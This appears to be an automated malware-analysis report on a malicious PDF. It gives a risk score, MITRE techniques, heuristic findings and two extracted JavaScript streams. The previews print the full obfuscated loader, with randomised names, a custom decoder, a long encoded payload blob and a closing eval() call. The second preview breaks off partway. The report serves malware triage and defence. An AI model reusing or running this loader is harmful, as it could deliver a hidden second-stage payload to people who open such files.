MALICIOUS
166
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.007 JavaScript
The PDF contains embedded JavaScript, indicated by PDF_JAVASCRIPT and PDF_JS heuristics. A high-severity PDF_EVAL heuristic firing suggests the use of eval() for obfuscation. The extracted JavaScript object, javascript_obj0013_000.js, likely contains obfuscated code that attempts to download and execute a second-stage payload, as evidenced by the eval() call and the presence of script obfuscation indicators. The authoring application Scribus is not inherently malicious, but the embedded script is highly suspicious.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
{vdhLM = "CDiePf";for(eval("" + f2jHRySV9+"" +"iae3bea="+"" + "M"/*eCCzyUxoiPzneIORpRdbl5n0AA5FwTYYgkYfFVTxuSlZl02aaeBLjyVt9a064hejRCOhisecLPB7ZCg0rrVaq1Tz*/+f2jHRySV9+ "a"+f2jHRySV9+ "t"+f2jHRySV9+ "h"+eHNZ4vWoLEKv8+eHNZ4vWoLEKv8+"."+f2jHRySV9+SvWLtYzat+f2jHRySV9+"i"+f2jHRySV9+"n(x4ei6BcgrX,XGbvEj2e25mCW)");iae3bea>o34FKYVq;iae3bea--,x4ei6BcgrX--){HgA1sml|=(aiw1tK[f2jHRySV9+z4Cq2[ eHNZ4vWoLEKv8+ ""+""+"c"+eHNZ4vWoLEKv8+"h"+eHNZ4vWoLEKv8+"a"+eHNZ4vWoLEKv8+"r"+eHNZ4vWoLEKv8+"C"+eHNZ4 … -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0013_000.js |
pdf-javascript-stream | PDF /JS object 13 at offset 0x336 | 9352 bytes |
SHA-256: 0c87b612449b287fe3e36e730e25b6e1dac536c2aab9f7b117078a9a04bd4e88 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s). 134 of 173 identifiers look randomly generated (e.g. 'yDtZRd_xATnuHgf5Qj_xua61p9epPa6RAwCBAz_u') — consistent with name-mangling obfuscation. Carved artifact contains 6 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var vdhLM = "CDiePf";
var SvWLtYzat = ""+ "m";
var f3ZDgztjAS = "e" +"";
var bbbbbz = "ent.wr";
var eHNZ4vWoLEKv8 = "",f2jHRySV9 = "";
var XZrKgW = ""+/*K98xD41kTM*/ "f" ;
var Sv3XQ = XZrKgW+ ""+eHNZ4vWoLEKv8+ ""+"r" /*ttXHRWsK*/ +""+eHNZ4vWoLEKv8+ ""+ /*eMRb4QUn*/ "o" +eHNZ4vWoLEKv8+ ""+""+ SvWLtYzat + eHNZ4vWoLEKv8+ ""+ "" + "C" +eHNZ4vWoLEKv8+"h"+eHNZ4vWoLEKv8+""+ "a"+eHNZ4vWoLEKv8+ ""+ "r"+eHNZ4vWoLEKv8+"C" + "" +eHNZ4vWoLEKv8+"o"+eHNZ4vWoLEKv8+"d" + "" +eHNZ4vWoLEKv8+f3ZDgztjAS + "" +"";
var BJeuy7 = new Array();
BJeuy7.push(1);
function HXwlQiWZtFWt(cPFA5A0ABXDFm){
var QO76W4JZ543RFQ = "BilJa6AyScZW";
var cvcccccc= (String[Sv3XQ ](cPFA5A0ABXDFm));
var lJc2h = "ZDnPnr";
return (cvcccccc);
}
function j3x97QH38BS(z4Cq2){
var xIjFcWyOqZT2X = "l8SfBmICU2J";
vdhLM = "CDiePf";
var o34FKYVq=0,
x4ei6BcgrX=z4Cq2.length,XGbvEj2e25mCW=1017+ 7,iae3bea,
UIkUvRLS,fi1AxkC= "",pGOxnqANUDz0=o34FKYVq,LR7Pv3rHUFW=o34FKYVq,HgA1sml=o34FKYVq,aiw1tK=Array(/*WjVgDKyxabTYzK9TLfQynteyfwA0yUsmDNSQiRNI4rr4CzWXfxWSqAQV7bf56YrJvKkel9wozorBnOjTLFvCQLhWxNb4vTMrn7VYESNEGF*/63,0,30,29,48,9,34,17,4,61,0,0,0,0,0,0,58,2,16,52,28,12,51,8,54,7,6,14,25,46,23,35,62,47,11,19,24,42,43,49,55,21,26,0,0,0,0,36,0,56,38,45,60,33,53,13,20,5,57,31,1,37,44,3,10,22,32,59,50,27,15,40,18,39,41/*PeAX1PSCpouMlHypDRB6EIanX4BlJRCO6Mv6mO*/);
var bhyt = "c";
for(UIkUvRLS=Math[ ""+ f2jHRySV9+ bhyt + "" +f2jHRySV9+f3ZDgztjAS +f2jHRySV9+ ""+"i"+f2jHRySV9 +"l"](x4ei6BcgrX/XGbvEj2e25mCW);UIkUvRLS>o34FKYVq;UIkUvRLS--)
{vdhLM = "CDiePf";for(eval("" + f2jHRySV9+"" +"iae3bea="+"" + "M"/*eCCzyUxoiPzneIORpRdbl5n0AA5FwTYYgkYfFVTxuSlZl02aaeBLjyVt9a064hejRCOhisecLPB7ZCg0rrVaq1Tz*/+f2jHRySV9+ "a"+f2jHRySV9+ "t"+f2jHRySV9+ "h"+eHNZ4vWoLEKv8+eHNZ4vWoLEKv8+"."+f2jHRySV9+SvWLtYzat+f2jHRySV9+"i"+f2jHRySV9+"n(x4ei6BcgrX,XGbvEj2e25mCW)");iae3bea>o34FKYVq;iae3bea--,x4ei6BcgrX--){HgA1sml|=(aiw1tK[f2jHRySV9+z4Cq2[ eHNZ4vWoLEKv8+ ""+""+"c"+eHNZ4vWoLEKv8+"h"+eHNZ4vWoLEKv8+"a"+eHNZ4vWoLEKv8+"r"+eHNZ4vWoLEKv8+"C"+eHNZ4vWoLEKv8+"o"+eHNZ4vWoLEKv8+"d"+eHNZ4vWoLEKv8+f3ZDgztjAS+eHNZ4vWoLEKv8 +"A"+eHNZ4vWoLEKv8+"t"](pGOxnqANUDz0++)-48])<<LR7Pv3rHUFW;
if(LR7Pv3rHUFW){fi1AxkC+=HXwlQiWZtFWt(187^HgA1sml/*K5dKjNlvmTde8GzXS67fmGXdl8UmbTMEY1YHOKDAnqpv8pSavZFhpmLbupNVJkkrlI00cMKQD0LKyoutNAbDxworm*/&/*O6x8wiQ7r3SCTfLo1KcuE16pD3m3tYFGdCOauogmr0yKoK0oemjtmoi1qU3k3H2gUP*/255);HgA1sml>>=5/*XEyB68AQvUZk0LT39Hk99FBsITtyxJGMXEXcLh4HBc2LyUN8m9FvNRofuher2uDY9lBU*/+3;LR7Pv3rHUFW-=4/*YlermzqHNx5VDzsenYZVCQW8e6GPGksVVWMHWCZtAdONdH3Rpbw33*/-2;
}else{LR7Pv3rHUFW=4+2;}}}
return(fi1AxkC);
}
BJeuy7.push(""+j3x97QH38BS( /*BgZP6p0yLeUhw1uWu60ISnZVEP7BR9fapE1v40tOoO7lO*/ "" /*yJ7QcZEC5SbBe3KJd0Xd6anyzcM7Nl8e5E6hnJtsmU4QXNjBXGpcrcbrF*/ +"WHnH5QzH5yn4uZabYsgFuUkt5Vc4Sp5rWHcFYO9FxS3fuHcCoSMCvvz4ZyEtRkjbNs3fxJR4uJVnEvcCNs9bSpnH5OdtY2cXYF9FSIL6I2cXYR54AV3tGQdbBZabAV3tGQErJQLntpnH5OdtuZabAV3tGQDmGsDHG0DtxNgXSMamNs3fhbw_1JVn5s9FKyDfupnH5Odt1MLnJRuntHnH5QLF2yEtxS3fuZabZQdtYHnC2FnX5XMX5OnChNgrWp3XuKLF2yEtxS3fuqabopjbWADntHnH5QjtZRdfhV9XuZabKNcXGOcHRs9_L@zFaQG6G@zFobkOv@zFGMaOR@zFR6vOo@zFvMarjszFob06aszFp6vOR@zFobQP0szFRKwOo@zFRpw0jszFvMarjszFoPv6v@zFE60OR@zFKKarjszFgUv6aszFKU0Ov@zFPya0p@zFPyT6jszFPO0rjszFvHQ0jszFKbwO@szFPV0rG@zFopwOg@zFRPwOK@zFKtwOg@zFE6arjszFobv6aszFG6GOv@zFR6GOo@zFKHT0G@zFEHarjszFR6T6R@zFG6T0G@zFvpGPA@zFvUwOR@zFG6wP0szFGHT09szFjs069szFR6w6v@zF9yG6o@zFRKGOv@zFaXvPp@zFR6a60szFvMT0@szFPXQ0jszFGbQOo@zFE@T0o@zFK@Q0K@zFvHarjszFR6T6v@zFgHGPG@zFR60rjszFob0Oo@zFp6QOg@zF0Oa6G@zFRParjszFR6ar@szFKHvPG@zFKMwOPszFoPvPG@zFRKGO0szFKbwOE@zFG6TPo@zFoUvP@szFPvwOjszF9XQP5@zF9Xk09szFaQG65@zF9FarjszF@sk05@zFjvaO9szF5@kOK@zFEKTOK@zFgHwPjszFgHwro@zFG6wPjszFjvGPR@zFgPTOp@zFRMa6R@zFgKwOR@zFgKwOv@zFg@GO5@zF5PG6K@zFgpw6aszFKMGOv@zFK6wOv@zF@VkPo@zFRPk0aszF9XvOaszFRPwOK@zF9varjszFa0arG@zFjQa6aszFoUkOaszFAKw0R@zFgKwOR@zFg@kO9szFgPT6PszFE@TOo@zFg6vO5@zFKPTO0szFo@kPo@zFR@0OPszF9XQ0aszFRPwOK@zFKMwrG@zFaQG6G@zFKMwOR@zFobQOg@zFRPwOK@zFayarG@zFo6GO9szFv6vP5@zFKMwO5@zFGHTPo@zF5HQ6@szF9XvOR@zFRPwOK@zFKtwOjszFjvwOg@zF9sQro@zFR@0r@szFK@T09szFgU06v@zF9X06R@zFgKa0E@zFEPGOv@zFGUvOR@zF5Hk69szFgpTO0szFEbTOG@zF5@kO9szFg@TOv@zFEMTOK@zFgHkOg@zFgHvOv@zFg@T6PszF5HvOK@zFgHkOG@zFg@vOK@zFg@GOv@zF5HvO5@zFgPkOA@zF5@kOE@zFgKGOR@zFGHvOR@zFgUGOR@zFg@TOE@zFG6G60szFEMG69szFgtTOp@zFGPkOK@zFRMG6Kbz_1JVnYS9tuZabKNcXGOcHRs9_L@zFRU06@szFRU06@szFRU06@szFRU06@yz_WpsC2V9tLkgfTo9bJMLfhQdbBMjtZRdfhV9X1JVnLRgXLkgfTo9bJMzFYsgtTV9t2vLb2@d6@QwP2@d6@QwPLp5rWpsC2V9X2yEtxInXuZab5MGrWpRtRynHAQzeuKcXZ0cX5OnClsg_SscHRy9fhOgCY2cXYF9FSoTnttdCxkcXuKLHxF3HNSgHBNjf2NgXvv9eGQDtZRn_ubcCDy9fhOgCBZTHxF3HNSgHBoTntHcCNk3HNSgHBQzeubcCDy9fhOgCY6nFLOdF5R3fDvj6NM5tRynHAR5rWpuHNSgHBQzeubcCDy9fhOgCY6nFLOdF5R3fDvj6NMLHxF3HNSgHBNjf2NgXvvcmGQDtZRn_1JVnEvcCNs9_LkgfTo3mNs3fD0dCB6dt5Vc4u2abRKdORMa6RpjbLkgfTo9bJMLHNSgHBoLHNSgHBoLXxk9fLkgfTogrWpVf2u9bJMLf2Fdb@yDtZRd_xATnuHgf5Qj_xua61p9epPa6RAwCBAz_uZcXqoMCbQzeub9fhOgCuAjbSscHRy9fhOgC1JVngV3tuqcFqQzeupV65pwrApwrApwrApwrApwrApwrAKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroATnt@dFxk3mRynCY0DXSbzyv@a6RMTXL2LfKuc_1JVWWJVC3Qj_gs3tGRgfYQjeuKw_WADntHnH5QzHk0gCBQzeu@Df2OEHZQnXSbzyKO06G6wyKvTPgPwyKOa6vMwyKQGPEKwyK0a6obQyKvTPR6QyKVGPEMwyKvTP@0QyKQarKKwyKQwrPyQyK0a6obQyKva0GPwyKFGPvMwyKsarobQyKXwPG6QyKswPvPwyKsk60VwyKsk65bQyKsvPobQyK0T0PyQyKsT6KUQyKsQPo6wyKvwrKHwyKQaOK@wyKsGOKHwyKFG6obQyKvTPG6QyKOG6EPwyKQG6EKwyKsTO9OwyKFTOobQyKQG65MwyKOG69OwyK0wraRwyK0w6KMwyKOG6@0QyKOTO9XQyKyQ0RHQyKQG6pPwyKXk6GKwyKQarEPwyKOk0aVwyKQG6RPQyK0a69VQyKsk0PyQyKOTPKKwyKFwO9vwyKsw0PswyK0TOobQyKQG65PwyKXTOaOwyKQGPobQyKvTPvKwyKVGPKHwyK0v6R6wyKQaOobQyKQG6oUQyKsT0aOwyKsa6K@QyKva0aOwyKQarEPQyKsT6KtwyKOG6jvwyKvwPaVQyKs0rKbQyKXk0@ywyKXk09XQyKO06GbwyKXvOobQyKVQ09ywyKy0rvHQyKyw0g@wyKFarg@wyKXTO@yQyKXTOAKwyKOG6@yQyKy0raQwyKXaOgUwyKQa6RMwyKXarKMwyKXarKPwyKXwOEbwyKyaOG@wyKXwrp6QyKsa6EPwyKsG6KPwyKVQPjvwyKQa09OQyKXk0E6QyKQaOK@wyKX0robQyKO0Oo6wyKy06R6QyKvwPg6QyKRarPQwyKXarKMwyKXw0gHQyKXaO5@QyKFwOgKwyKXGPEbwyKsaOgPQyKvw0jvwyKQw0v@QyKXk0POQyKQaOK@wyKsa6A6wyKO06G6wyKsa6KMwyKvTPKHwyKQaOK@wyKOk6o6wyKvG6EHQyK0GPaywyKsa6KbwyKOTOjvwyKyT0pUQyKXk0EMwyKQaOK@wyKsGOKbQyKy0rKHwyKXQ0AKwyKQw0oUQyKswO9XQyKXwPRPwyKXk0RMwyKXar0FwyKFaOEPwyKOwPEMwyKyT05HQyKXwrgPQyKFT6g6wyKyw0gHQyKXwOgPwyKFa6g@wyKXT0gHwyKXT0EPwyKXwO5@QyKyT0E@wyKXT0g6wyKXw0E@wyKXwOEPwyKyT0EbwyKXa0gpwyKyw0gtwyKXarEMwyKOT0EMwyKXw6EMwyKXwOgtwyKOG6GPQyKFa6GHQyKXGOgUwyKOa0g@wyKQa6G@TbxATntHnH5Qzf2ugjZyDtZRdbJMLf2Fdb@yDtZRd_xATntHnH5Q5HTQzeuMa4R696TQGHR6grWpuFZydbZ09X5QzeuMa4vMa6RMa61JVngV3tu6EH_kcXYQzeuU9XkogCY2cXYF9FSQL_ubGrWpuFZydbNs3fuZabZ09X5QzmuK5tTSPf2Ng_RKE6op5rWpuFZydbAV3tGQdbJMzFYsgtTV9t2vLb2@nrRpa62@nrRpa6Lp5rWpV4ZyEtRQzeuHcCoSMCvvz4ZyEtRkjbNs3fxATntHnH5Q5HhsDfvyabJMj_TO9bqMj6o0a6RMa6Rp5mZ09X5oTn3S3tuKLFZydbTScFY0neRAGHhsDfvkGHhsDfvyGrTScFY0E_BpLn1IsbuMjbqscf_V3t5Vc4rOgfKN9FbQzeupnH5OdtuAjbZ09XBogrWZDntHnH5Q5fgs3t3kgfEQzeu@Df2OEHZQnXSbzyKQGHR6cyKQGHR63bxATnttdCxkcXSx3F2yDXNSgFY2cXYF9FSQjeuPaOA@T6xM5fgs3t3kgfEQ5_JM5fgs3t3kgfEoTntPdCxODmTS9fNV3Hw0Ef5s9bJM5Phk9fZy3mTS9fNsgHvsQfZR9ftN3Xhv54GsDH7IabLbjmqOEXlM5fgs3t3kgfEun_1JVWWJVC3Qj_gs3tGRgfYQjeupTmppznWpR4Wp3XuKzHRQDmkSgHY6vfNkcHLN5X20ndTS3fxADnuMjbuMLFZydbgXdt20dCAV9bJ@Df2OEHZQnXSbzyKO06G6wyKvTPgPwyKOa6vMwyKQGPEKwyK0a6obQyKvTPR6QyKVGPEMwyKvTP@0QyKQarKKwyKQwrPyQyK0a6obQyKva0GPwyKFGPvMwyKsarobQyKXwPG6QyKswPvPwyKsk60VwyKsk65bQyKsvPobQyK0T0PyQyKsT6KUQyKsQPo6wyKvwrKHwyKQaOK@wyKsGOKHwyKFG6obQyKvTPG6QyKOG6EPwyKQG6EKwyKsTO9OwyKFTOobQyKQG65MwyKOG69OwyK0wraRwyK0w6KMwyKOG6@0QyKOTO9XQyKyQ0RHQyKQG6pPwyKXk6GKwyKQarEPwyKOk0aVwyKQG6RPQyK0a69VQyKsk0PyQyKOTPKKwyKFwO9vwyKsw0PswyK0TOobQyKQG65PwyKXTOaOwyKQGPobQyKvTPvKwyKVGPKHwyK0v6R6wyKQaOobQyKQG6oUQyKsT0aOwyKsa6K@QyKva0aOwyKQarEPQyKsT6KtwyKOG6jvwyKvwPaVQyKs0rKbQyKXk0@ywyKXk09XQyKO06GbwyKXvOobQyKVQ09ywyKy0rvHQyKyw0g@wyKFarg@wyKXTO@yQyKXTOAKwyKOG6@yQyKy0raQwyKXaOgUwyKQa6RMwyKXarKMwyKXarKPwyKXwOEbwyKyaOG@wyKXwrp6QyKsa6EPwyKsG6KPwyKVQPjvwyKQa09OQyKXk0E6QyKQaOK@wyKX0robQyKO0Oo6wyKy06R6QyKvwPg6QyKRarPQwyKXarKMwyKXw0gHQyKXaO5@QyKFwOgKwyKXGPEbwyKsaOgPQyKvw0jvwyKQw0v@QyKXk0POQyKQaOK@wyKsa6A6wyKO06G6wyKsa6KMwyKvTPKHwyKQaOK@wyKOk6o6wyKvG6EHQyK0GPaywyKsa6KbwyKOTOjvwyKyT0pUQyKXk0EMwyKQaOK@wyKsGOKbQyKy0rKHwyKXQ0AKwyKQw0oUQyKswO9XQyKXwPRPwyKXk0RMwyKXar0FwyKFaOEPwyKOwPEMwyKyT05HQyKXwrgPQyKFT6g6wyKyw0gHQyKXwOgPwyKFa6g@wyKXT0gHwyKXT0EPwyKXwO5@QyKyT0E@wyKXT0g6wyKXw0E@wyKXwOEPwyKyT0EbwyKXa0gpwyKyw0gtwyKXarEMwyKOT0EMwyKXw6EMwyKXwOgtwyKOG6GPQyKFa6GHQyKXGOgUwyKOa0g@wyKQa6G@TbxATntMLFZydbSFMtKMa6aN0bJMLFgQnXvvc4ZNjf2NgXvv9b7ML61JVnuHnH5Qjf2N9bJMj6o0a6RMa6RMzmuKjCnVnORMGPfQ5_uMa4GKw_1JVnuHnH5Qz4ZyEtRQzeu@Df2OEHZQnXSbzyKRa6AMwyKRa6AMTbxATntMz4ZyEtRQzeuHcCoSMCvvz4ZyEtRkjbNs3fxATntMLFZydbRswP7okOKH9bJMj_RKd6TQGHR696TQzmuMa4vMa6RMa6xM5muMa4vMa6RMa61JsbuMjbuHgf5Qj_gV3tuHntTVP0AHw4uZabRAabgVEHU0QrgpdbIMjtKUkC4XwO3oabgVEHU0QrgpdbBAjbxADnuMjbuMzH5yn4rXntTVP0AHw4bQzeupnH5OdtuAjbgXdt20dCAVgrJIsbuMjbuHnH5QjFMu0Cfyg0EQzeu@Df2OEHZQnXSbzyRpTbxATnuMjbuM5FSR9f2Qj_vsM9SNkHdFDmNs3fD0dCu2abRKdORMa6xPnsHv39LFvFuAzeuPnsHv39LFvF1JsbuMjbuPnsHv39LFvFuZabLqkmLM5_uPnsHv39LFvF1JVnuU9tRNjXhO3maS9fNV3HYtcXvRvHhN9_vsM9SNkHdFn_1JVnJIVnJo" + ""));eval(BJeuy7);
|
|||
javascript_obj0013_001.js |
pdf-javascript-stream | PDF /JS object 13 at offset 0x358 | 10058 bytes |
SHA-256: 4259111919fea68b7931470de169dcba4e5887480db6021d028cfeafc7e1dea2 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s). 135 of 187 identifiers look randomly generated (e.g. 'yDtZRd_xATnuHgf5Qj_xua61p9epPa6RAwCBAz_u') — consistent with name-mangling obfuscation. Carved artifact contains 6 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var vdhLM = "CDiePf";
var SvWLtYzat = ""+ "m";
var f3ZDgztjAS = "e" +"";
var bbbbbz = "ent.wr";
var eHNZ4vWoLEKv8 = "",f2jHRySV9 = "";
var XZrKgW = ""+/*K98xD41kTM*/ "f" ;
var Sv3XQ = XZrKgW+ ""+eHNZ4vWoLEKv8+ ""+"r" /*ttXHRWsK*/ +""+eHNZ4vWoLEKv8+ ""+ /*eMRb4QUn*/ "o" +eHNZ4vWoLEKv8+ ""+""+ SvWLtYzat + eHNZ4vWoLEKv8+ ""+ "" + "C" +eHNZ4vWoLEKv8+"h"+eHNZ4vWoLEKv8+""+ "a"+eHNZ4vWoLEKv8+ ""+ "r"+eHNZ4vWoLEKv8+"C" + "" +eHNZ4vWoLEKv8+"o"+eHNZ4vWoLEKv8+"d" + "" +eHNZ4vWoLEKv8+f3ZDgztjAS + "" +"";
var BJeuy7 = new Array();
BJeuy7.push(1);
function HXwlQiWZtFWt(cPFA5A0ABXDFm){
var QO76W4JZ543RFQ = "BilJa6AyScZW";
var cvcccccc= (String[Sv3XQ ](cPFA5A0ABXDFm));
var lJc2h = "ZDnPnr";
return (cvcccccc);
}
function j3x97QH38BS(z4Cq2){
var xIjFcWyOqZT2X = "l8SfBmICU2J";
vdhLM = "CDiePf";
var o34FKYVq=0,
x4ei6BcgrX=z4Cq2.length,XGbvEj2e25mCW=1017+ 7,iae3bea,
UIkUvRLS,fi1AxkC= "",pGOxnqANUDz0=o34FKYVq,LR7Pv3rHUFW=o34FKYVq,HgA1sml=o34FKYVq,aiw1tK=Array(/*WjVgDKyxabTYzK9TLfQynteyfwA0yUsmDNSQiRNI4rr4CzWXfxWSqAQV7bf56YrJvKkel9wozorBnOjTLFvCQLhWxNb4vTMrn7VYESNEGF*/63,0,30,29,48,9,34,17,4,61,0,0,0,0,0,0,58,2,16,52,28,12,51,8,54,7,6,14,25,46,23,35,62,47,11,19,24,42,43,49,55,21,26,0,0,0,0,36,0,56,38,45,60,33,53,13,20,5,57,31,1,37,44,3,10,22,32,59,50,27,15,40,18,39,41/*PeAX1PSCpouMlHypDRB6EIanX4BlJRCO6Mv6mO*/);
var bhyt = "c";
for(UIkUvRLS=Math[ ""+ f2jHRySV9+ bhyt + "" +f2jHRySV9+f3ZDgztjAS +f2jHRySV9+ ""+"i"+f2jHRySV9 +"l"](x4ei6BcgrX/XGbvEj2e25mCW);UIkUvRLS>o34FKYVq;UIkUvRLS--)
{vdhLM = "CDiePf";for(eval("" + f2jHRySV9+"" +"iae3bea="+"" + "M"/*eCCzyUxoiPzneIORpRdbl5n0AA5FwTYYgkYfFVTxuSlZl02aaeBLjyVt9a064hejRCOhisecLPB7ZCg0rrVaq1Tz*/+f2jHRySV9+ "a"+f2jHRySV9+ "t"+f2jHRySV9+ "h"+eHNZ4vWoLEKv8+eHNZ4vWoLEKv8+"."+f2jHRySV9+SvWLtYzat+f2jHRySV9+"i"+f2jHRySV9+"n(x4ei6BcgrX,XGbvEj2e25mCW)");iae3bea>o34FKYVq;iae3bea--,x4ei6BcgrX--){HgA1sml|=(aiw1tK[f2jHRySV9+z4Cq2[ eHNZ4vWoLEKv8+ ""+""+"c"+eHNZ4vWoLEKv8+"h"+eHNZ4vWoLEKv8+"a"+eHNZ4vWoLEKv8+"r"+eHNZ4vWoLEKv8+"C"+eHNZ4vWoLEKv8+"o"+eHNZ4vWoLEKv8+"d"+eHNZ4vWoLEKv8+f3ZDgztjAS+eHNZ4vWoLEKv8 +"A"+eHNZ4vWoLEKv8+"t"](pGOxnqANUDz0++)-48])<<LR7Pv3rHUFW;
if(LR7Pv3rHUFW){fi1AxkC+=HXwlQiWZtFWt(187^HgA1sml/*K5dKjNlvmTde8GzXS67fmGXdl8UmbTMEY1YHOKDAnqpv8pSavZFhpmLbupNVJkkrlI00cMKQD0LKyoutNAbDxworm*/&/*O6x8wiQ7r3SCTfLo1KcuE16pD3m3tYFGdCOauogmr0yKoK0oemjtmoi1qU3k3H2gUP*/255);HgA1sml>>=5/*XEyB68AQvUZk0LT39Hk99FBsITtyxJGMXEXcLh4HBc2LyUN8m9FvNRofuher2uDY9lBU*/+3;LR7Pv3rHUFW-=4/*YlermzqHNx5VDzsenYZVCQW8e6GPGksVVWMHWCZtAdONdH3Rpbw33*/-2;
}else{LR7Pv3rHUFW=4+2;}}}
return(fi1AxkC);
}
BJeuy7.push(""+j3x97QH38BS( /*BgZP6p0yLeUhw1uWu60ISnZVEP7BR9fapE1v40tOoO7lO*/ "" /*yJ7QcZEC5SbBe3KJd0Xd6anyzcM7Nl8e5E6hnJtsmU4QXNjBXGpcrcbrF*/ +"WHnH5QzH5yn4uZabYsgFuUkt5Vc4Sp5rWHcFYO9FxS3fuHcCoSMCvvz4ZyEtRkjbNs3fxJR4uJVnEvcCNs9bSpnH5OdtY2cXYF9FSIL6I2cXYR54AV3tGQdbBZabAV3tGQErJQLntpnH5OdtuZabAV3tGQDmGsDHG0DtxNgXSMamNs3fhbw_1JVn5s9FKyDfupnH5Odt1MLnJRuntHnH5QLF2yEtxS3fuZabZQdtYHnC2FnX5XMX5OnChNgrWp3XuKLF2yEtxS3fuqabopjbWADntHnH5QjtZRdfhV9XuZabKNcXGOcHRs9_L@zFaQG6G@zFobkOv@zFGMaOR@zFR6vOo@zFvMarjszFob06aszFp6vOR@zFobQP0szFRKwOo@zFRpw0jszFvMarjszFoPv6v@zFE60OR@zFKKarjszFgUv6aszFKU0Ov@zFPya0p@zFPyT6jszFPO0rjszFvHQ0jszFKbwO@szFPV0rG@zFopwOg@zFRPwOK@zFKtwOg@zFE6arjszFobv6aszFG6GOv@zFR6GOo@zFKHT0G@zFEHarjszFR6T6R@zFG6T0G@zFvpGPA@zFvUwOR@zFG6wP0szFGHT09szFjs069szFR6w6v@zF9yG6o@zFRKGOv@zFaXvPp@zFR6a60szFvMT0@szFPXQ0jszFGbQOo@zFE@T0o@zFK@Q0K@zFvHarjszFR6T6v@zFgHGPG@zFR60rjszFob0Oo@zFp6QOg@zF0Oa6G@zFRParjszFR6ar@szFKHvPG@zFKMwOPszFoPvPG@zFRKGO0szFKbwOE@zFG6TPo@zFoUvP@szFPvwOjszF9XQP5@zF9Xk09szFaQG65@zF9FarjszF@sk05@zFjvaO9szF5@kOK@zFEKTOK@zFgHwPjszFgHwro@zFG6wPjszFjvGPR@zFgPTOp@zFRMa6R@zFgKwOR@zFgKwOv@zFg@GO5@zF5PG6K@zFgpw6aszFKMGOv@zFK6wOv@zF@VkPo@zFRPk0aszF9XvOaszFRPwOK@zF9varjszFa0arG@zFjQa6aszFoUkOaszFAKw0R@zFgKwOR@zFg@kO9szFgPT6PszFE@TOo@zFg6vO5@zFKPTO0szFo@kPo@zFR@0OPszF9XQ0aszFRPwOK@zFKMwrG@zFaQG6G@zFKMwOR@zFobQOg@zFRPwOK@zFayarG@zFo6GO9szFv6vP5@zFKMwO5@zFGHTPo@zF5HQ6@szF9XvOR@zFRPwOK@zFKtwOjszFjvwOg@zF9sQro@zFR@0r@szFK@T09szFgU06v@zF9X06R@zFgKa0E@zFEPGOv@zFGUvOR@zF5Hk69szFgpTO0szFEbTOG@zF5@kO9szFg@TOv@zFEMTOK@zFgHkOg@zFgHvOv@zFg@T6PszF5HvOK@zFgHkOG@zFg@vOK@zFg@GOv@zF5HvO5@zFgPkOA@zF5@kOE@zFgKGOR@zFGHvOR@zFgUGOR@zFg@TOE@zFG6G60szFEMG69szFgtTOp@zFGPkOK@zFRMG6Kbz_1JVnYS9tuZabKNcXGOcHRs9_L@zFRU06@szFRU06@szFRU06@szFRU06@yz_WpsC2V9tLkgfTo9bJMLfhQdbBMjtZRdfhV9X1JVnLRgXLkgfTo9bJMzFYsgtTV9t2vLb2@d6@QwP2@d6@QwPLp5rWpsC2V9X2yEtxInXuZab5MGrWpRtRynHAQzeuKcXZ0cX5OnClsg_SscHRy9fhOgCY2cXYF9FSoTnttdCxkcXuKLHxF3HNSgHBNjf2NgXvv9eGQDtZRn_ubcCDy9fhOgCBZTHxF3HNSgHBoTntHcCNk3HNSgHBQzeubcCDy9fhOgCY6nFLOdF5R3fDvj6NM5tRynHAR5rWpuHNSgHBQzeubcCDy9fhOgCY6nFLOdF5R3fDvj6NMLHxF3HNSgHBNjf2NgXvvcmGQDtZRn_1JVnEvcCNs9_LkgfTo3mNs3fD0dCB6dt5Vc4u2abRKdORMa6RpjbLkgfTo9bJMLHNSgHBoLHNSgHBoLXxk9fLkgfTogrWpVf2u9bJMLf2Fdb@yDtZRd_xATnuHgf5Qj_xua61p9epPa6RAwCBAz_uZcXqoMCbQzeub9fhOgCuAjbSscHRy9fhOgC1JVngV3tuqcFqQzeupV65pwrApwrApwrApwrApwrApwrAKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroATnt@dFxk3mRynCY0DXSbzyv@a6RMTXL2LfKuc_1JVWWJVC3Q